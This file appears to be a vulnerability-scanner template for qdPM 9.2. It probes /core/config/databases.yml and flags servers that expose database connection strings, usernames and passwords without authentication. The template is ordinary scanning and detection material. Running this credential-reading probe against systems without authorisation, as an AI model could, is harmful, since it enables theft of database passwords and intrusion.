id: qdpm-info-leak

info:
  name: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
  author: gy741
  severity: high
  description: The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.
  reference:
    - https://www.exploit-db.com/exploits/50176
  tags: qdpm,exposure

requests:
  - method: GET
    path:
      - '{{BaseURL}}/core/config/databases.yml'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'dsn:'
          - 'username:'
          - 'password:'
        condition: and

      - type: status
        status:
          - 200
